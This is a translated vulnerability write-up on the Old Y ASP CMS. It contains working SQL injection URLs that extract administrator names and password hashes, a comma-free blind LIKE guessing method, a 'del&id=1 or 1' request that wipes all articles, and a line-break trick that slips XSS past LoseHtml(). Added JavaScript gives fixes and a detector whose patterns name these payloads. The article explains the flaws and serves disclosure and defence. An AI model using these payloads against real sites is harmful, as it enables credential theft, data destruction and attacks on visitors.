Author: Cschii Excerpt from: Anti-DDoS pro
[Keywords]: CheckStr() function, LoseHtml() function, comma bypass, wildcards, line breaks, alternative manual injection, cross-site scripting
[Technical points]:
1. The latest four vulnerabilities in Old Y are disclosed;
2. The regular expression "(<.+?>)" is used to strip tags, but "." matches any character except a line feed, so inserting a line feed inside an HTML tag lets the tag slip past the regular expression;
3. Commas are bypassed with an alternative manual injection. The CheckStr() function strips commas, so multi-parameter functions such as the string truncation function mid() cannot be used, and a union statement cannot be used either, because a union must keep the number of fields consistent; the symbols "<", ">" and "=" are unavailable as well. Instead, a select ... like statement is used to guess the characters of the password's MD5 hash one at a time; the valid characters are 0-9 and A-F (the comparison is case-insensitive);
4. Code for converting between strings and Unicode characters is provided;
[Main content]:
Old Y uses pseudo-static pages (called through /Html/Index.asp). The code is fairly concise and the filtering is strict: numeric values pass through LaoYRequest(), string values through CheckStr() and similar functions to prevent injection, and text content through the LoseHtml() function to prevent cross-site scripting. It offers a comprehensive feature set, including news, announcements, messages, comments, RSS, user registration, site styles, and a Simplified/Traditional Chinese option, with few dynamic page files.
However, even the wise slip once in a thousand thoughts. This article analyzes Old Y thoroughly, and once again the lesson is that security filtering must be strict! Old Y's CheckStr() function has a fatal flaw: it filters out commas but overlooks parentheses, which lets us construct SQL statements for injection. The article covers an alternative manual injection method, bypassing functions such as mid() and using the like keyword to guess characters; vulnerability 2 can completely gut an Old Y site, deleting every article and leaving only the "skeleton", the site framework. Because Old Y's LoseHtml() function uses its regular expression incorrectly, the line-break insertion method can be used to submit cross-site scripts, and a cross-site comment also affects the site's homepage! Scripts such as page redirects, window close and endless loops amount to a DDoS, and administrator cookies, web Trojans, worms and other cross-site attacks are possible as well. All of this stems from insufficient filtering in Old Y's functions! Finally, a reminder: when deploying Old Y, you must change the administrator user table name and the backend management directory.
Vulnerability 1: js.asp page vulnerability. This vulnerability was discovered by magic spring (bl4ck. When js.asp processes values already filtered by the CheckStr() function, it restores the "|" delimiter to "," (a comma), which results in injection.
Exploitation link:
Code:
http://127.0.0.1/laoy/js.asp?maxlen=50&num=5&ClassNo=1|1|1)%09Union%09Select%091|cstr(id)%2Bchr(58)%2Badmin_name%2Bchr(58)%2Badmin_pass|3|4|5|6|7|8|9%09From%09yao_admin%09Where%09(1
// The maxlen and num parameters must be supplied.
// cstr() converts the numeric id field into a string,
// %2B, i.e. "+", concatenates the id, admin_name and admin_pass fields,
// chr(58), i.e. ":", is the delimiter between them.
Note: The backend authentication differs between versions 2.3 and 2.4: in 2.3 the administrator password is a 16-character MD5 hash and login authentication uses Session; in 2.4 the administrator password is a truncated 18-character MD5 hash (adminpwd = Mid(md5(adminpwd,32),)) and authentication uses cookies. A puzzling change: although the 2.3 Session cannot be forged, its 16-character MD5 hash can be looked up online or cracked; and although the truncated 18-character MD5 hash in 2.4 cannot be looked up (unless you write your own brute-force tool), cookie spoofing is possible, which is more convenient than cracking the hash.
Vulnerability 2: User/UserAdd.asp page vulnerability. On the User/UserAdd.asp page, the edit() and saveedit() modules filter the numeric variable id only with the CheckStr() function, which allows manual injection to obtain the administrator password; the del() and delAll() modules do not filter the variable id at all, so articles can be deleted at will. This vulnerability can only be exploited after logging in as a user.
Exploiting the edit() module vulnerability:
Modify any article. It is easy to see from the code that if id is "168 OR 1", the SQL statement is guaranteed to return a non-empty set, so the editing interface for the article with id 168 opens; saveedit() has the same flaw, so we can modify any article. Note that an edited article reverts to unreviewed. Of course, being able to modify any article is not worth much by itself, so let's keep digging.
Injecting the administrator password. As introduced above, version 2.3 does not filter commas, so constructing a union statement is relatively easy; version 2.4 filters commas and needs some tricks. The two are therefore covered separately.
Bypassing commas with an alternative manual injection. The CheckStr() function filters out commas, so multi-parameter functions such as the string truncation function mid() cannot be used, and a union statement cannot be used either, since a union must keep the number of fields consistent; the symbols <, > and = are also unavailable, which makes manual injection challenging. So we turn to the select ... like statement, whose basic form is:
Code:
Select * from yao_admin where admin_pass like 1*
Select * from yao_admin where admin_pass like 1?????????????????
// admin_pass is 18 characters long, so "1" is followed by 17 "?". If the first character of the password is "1", the Select returns a row; otherwise it returns nothing. This works like the IIF function.
Because the CheckStr() function filters single and double quotation marks, a subquery is introduced to obtain the derived statement:
Code:
Select top 1 * from yao_admin where admin_pass like (Select chr(49)+chr(42) from yao_admin)
// chr(49) is the digit "1", chr(42) is the character "*", and chr(63) is the character "?"
Replace the "*" in "top 1 *" with the ID of an article you posted yourself, such as 185 (you can "post a new article" first to obtain its ID). The URL used is as follows:
Code:
http://127.0.0.1/laoy/User/UserAdd.asp?action=edit&id=(Select%09top%091%09185%09From%09yao_admin%09Where%09admin_pass%09Like%09(Select%09chr(49)%2Bchr(37)%09From%09yao_admin))
// The Access query-interface wildcards "*" and "?" become "%" and "_" in Jet SQL executed through ADO; chr(37) is the character "%".
Note: The wildcards "*" and "?" of the Access query interface must become "%" and "_" when used in Jet SQL executed through ADO; that is, the ANSI SQL wildcards "%" and "_" are valid only with Microsoft Jet 4.x and the Microsoft OLE DB Provider for Jet, whereas in Microsoft Access or DAO they are treated as literal text. Therefore, in the exploitation URL above, the chr(42) ("*") of the derived statement is replaced with chr(37) ("%").
After visiting the URL, if the system responds "this is not good!", the 1st character of admin_pass is not chr(49), the digit "1"; change it to chr(50) to chr(57) and chr(65) to chr(70), corresponding to the digits 2 to 9 and the letters A to F (the like comparison is case-insensitive). If the editing page for article 185 opens normally, the 1st character of admin_pass has been determined, and you can then guess the 2nd, 3rd, and so on up to the 18th character.
Exploiting the del() module vulnerability. The id variable is not filtered; if id is set to "1 or 1", every article on the site is deleted! The damage is severe.
The "or 1" used in this article differs from the usual "or 1=1" because Old Y's CheckStr() function filters the "<", ">" and "=" symbols, so we use the fact that the numbers 1 and 0 can stand for logical true and false to build the SQL statement.
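The two flaws in vulnerability 2 share one root cause: the id parameter is checked with a character blocklist (CheckStr()) or not at all, instead of being required to be a number. The JavaScript below is an added example, not Old Y's code: an allow-list check for the numeric id, and a small detector run over constructed request-log lines that flags the shapes described in this article (tab-encoded whitespace between SQL keywords, chr() concatenation, parenthesised subqueries, "or 1" in place of "or 1=1"). The paths and parameter names follow the article; the log lines and indicator names are ours.

```javascript
// Added example, not code from the Old Y project. An allow-list check for the
// numeric "id" that edit(), saveedit() and del() pass into SQL, plus a small
// detector run over constructed request-log lines. Parameter names and paths
// follow the article; the log lines and indicator names are made up for the demo.

function isValidNumericId(raw) {
  // Positive validation: digits only. "168 OR 1", "1 or 1" and "(Select ..."
  // all fail here without any blocklist of "," "<" ">" or "=".
  return /^\d{1,10}$/.test(String(raw));
}

// Shapes described in the article, matched against the decoded and
// whitespace-normalised value of each parameter.
const INDICATORS = [
  { name: "sql-keyword", re: /\b(select|union|from|where)\b/i },
  { name: "like-guess",  re: /\blike\b/i },                  // character guessing via LIKE
  { name: "chr-concat",  re: /chr\s*\(\s*\d+\s*\)\s*\+/i },  // chr(..)+chr(..) builds strings without quotes
  { name: "boolean-or",  re: /\b(or|and)\s+[01]\b/i },       // "or 1" instead of "or 1=1"
  { name: "subquery",    re: /\(\s*select\b/i },             // parentheses survive CheckStr()
];

function decodeParam(value) {
  // %09 (tab) stands in for the space that CheckStr() strips; fold every
  // whitespace run to one space so the keyword patterns above still match.
  let s;
  try { s = decodeURIComponent(value.replace(/\+/g, " ")); } catch (e) { s = value; }
  return s.replace(/\s+/g, " ").trim();
}

function parseQuery(requestLine) {
  // "GET /path?a=b&c=d HTTP/1.1" -> { a: "b", c: "d" }, values still encoded
  const m = requestLine.match(/^\S+\s+\S*?\?(\S*)/);
  if (!m) return {};
  const params = {};
  for (const pair of m[1].split("&")) {
    const eq = pair.indexOf("=");
    const key = (eq < 0 ? pair : pair.slice(0, eq)).toLowerCase();
    params[key] = eq < 0 ? "" : pair.slice(eq + 1);
  }
  return params;
}

function analyzeRequest(requestLine) {
  const findings = [];
  for (const [name, raw] of Object.entries(parseQuery(requestLine))) {
    const value = decodeParam(raw);
    if (name === "id" && !isValidNumericId(value)) {
      findings.push(`${name}: not a plain numeric id`);
    }
    for (const ind of INDICATORS) {
      if (ind.re.test(value)) findings.push(`${name}: ${ind.name}`);
    }
  }
  return findings;
}

// Constructed sample request lines (not captured traffic). Lines 2-4 mirror the
// article's edit(), password-guessing and del() cases; lines 1 and 5 are benign.
const SAMPLE_LOG = [
  "GET /laoy/User/UserAdd.asp?action=edit&id=185 HTTP/1.1",
  "GET /laoy/User/UserAdd.asp?action=edit&id=168%20OR%201 HTTP/1.1",
  "GET /laoy/User/UserAdd.asp?action=edit&id=(Select%09top%091%09185%09From%09yao_admin%09Where%09admin_pass%09Like%09(Select%09chr(49)%2Bchr(37)%09From%09yao_admin)) HTTP/1.1",
  "GET /laoy/User/UserAdd.asp?action=del&id=1%20or%201 HTTP/1.1",
  "GET /laoy/js.asp?maxlen=50&num=5&ClassNo=1 HTTP/1.1",
];

function scanLog(lines) {
  return lines.map((line) => ({ line, findings: analyzeRequest(line) }));
}

for (const entry of scanLog(SAMPLE_LOG)) {
  console.log(entry.findings.length ? "ALERT" : "ok   ", entry.line.slice(0, 60), entry.findings);
}
```

The allow-list check is the actual fix (on the server side, the equivalent is to require a numeric id, or better, a parameterised query); the indicator list is only a detection aid, and the whitespace normalisation matters because %09 was chosen precisely to avoid the space character that CheckStr() removes.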
Vulnerability 3: Cross-site scripting via comments. Old Y uses the ChkBadWords() and GlHtml() functions to filter HTML tags and single and double quotation marks when outputting memContent (the comment body), so that field cannot be used for cross-site scripting; however, the unfiltered memAuthor field can. At the bottom of the article page the "nickname" (memAuthor) field is a single-line input box that cannot be edited directly, so we save and modify the submission page as follows: change the author input box to a textarea element so that multiple lines (that is, line breaks) can be entered, adjust the form's action value and the ArticleID value to match the actual site, and set "" to a line break.
The LoseHtml() function code is as follows:
Code:
Function LoseHtml(ContentStr)
    Dim ClsTempLoseStr, regEx
    ClsTempLoseStr = CStr(ContentStr)
    Set regEx = New RegExp
    regEx.Pattern = "(<.+?>)"
    regEx.IgnoreCase = True
    regEx.Global = True
    ClsTempLoseStr = regEx.Replace(ClsTempLoseStr, "")
    ' This replaces "<", ">" and everything between them with nothing.
    ' Because "." does not match a line break, a tag containing one survives.
    regEx.Pattern = "(&.+?;)"
    ClsTempLoseStr = regEx.Replace(ClsTempLoseStr, "")
    ClsTempLoseStr = Replace(ClsTempLoseStr, vbCrLf, "")
    ClsTempLoseStr = Replace(ClsTempLoseStr, vbCr, "")
    ClsTempLoseStr = Replace(ClsTempLoseStr, vbLf, "")
    ' Carriage returns and line feeds are replaced with nothing, but only after the tag pass.
    ' ...... (omitted) filtering of single and double quotation marks, spaces, etc.
    LoseHtml = ClsTempLoseStr
End Function
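The defect is the ordering: the tag regex runs while the line break is still inside the tag, and only afterwards are the line breaks deleted, which stitches the two halves back into a working tag. The JavaScript below is an added example, not Old Y's code; its RegExp engine shares the property that matters with the VBScript RegExp object ("." never matches a line break), so loseHtmlFlawed() reproduces the behaviour of LoseHtml() above, and the hardened strip, the output-encoding alternative and the detection helper are ours. The sample input is constructed.

```javascript
// Added example, not code from the Old Y project. loseHtmlFlawed() mirrors the
// article's LoseHtml(); loseHtmlHardened(), escapeHtml() and
// hasLineBreakInsideTag() are our own hardening and detection helpers.

// Mirrors: Pattern "(<.+?>)", IgnoreCase, Global, then "(&.+?;)", then the
// three Replace() calls that remove vbCrLf, vbCr and vbLf.
function loseHtmlFlawed(content) {
  let s = String(content);
  s = s.replace(/(<.+?>)/gi, "");   // "." stops at a line break, so "<script\n>" survives
  s = s.replace(/(&.+?;)/gi, "");
  s = s.replace(/\r\n|\r|\n/g, ""); // line breaks removed only AFTER the tag pass,
  return s;                         // which re-joins the split tag into "<script>"
}

// Hardened strip: normalise line breaks before the tag pass, and match tags
// with [\s\S], which also matches line breaks. The VBScript RegExp object
// supports that class too, unlike the modern JavaScript "s" flag.
function loseHtmlHardened(content) {
  let s = String(content);
  s = s.replace(/\r\n|\r|\n/g, "");
  s = s.replace(/<[\s\S]+?>/g, "");
  s = s.replace(/&[\s\S]+?;/g, "");
  return s;
}

// Output encoding does not rely on recognising tags at all, so there is no
// pattern to split. This is the appropriate defence for a field such as
// memAuthor that is echoed back into a page.
function escapeHtml(content) {
  return String(content)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Detection helper for stored input or request logs: a line break between "<"
// and the closing ">" has no legitimate use in a single-line author field.
function hasLineBreakInsideTag(content) {
  return /<[^>]*[\r\n][^>]*>/.test(String(content));
}

// Constructed sample: the line-break insertion the article describes,
// applied to a script tag.
const SAMPLE = "<script\n>alert(1)</script>";

function demo() {
  return {
    flawed: loseHtmlFlawed(SAMPLE),         // "<script>alert(1)" - the tag is rebuilt
    hardened: loseHtmlHardened(SAMPLE),     // "alert(1)"
    encoded: escapeHtml(SAMPLE),            // "&lt;script\n&gt;alert(1)&lt;/script&gt;"
    flagged: hasLineBreakInsideTag(SAMPLE), // true
  };
}

console.log(demo());
```

Even the hardened strip is still a blocklist (an unterminated "<script" or a stray "<" is not a match), which is why escapeHtml() is the version to use when the value is written into HTML; the stripping variant is kept only to show the minimal fix to the regex itself.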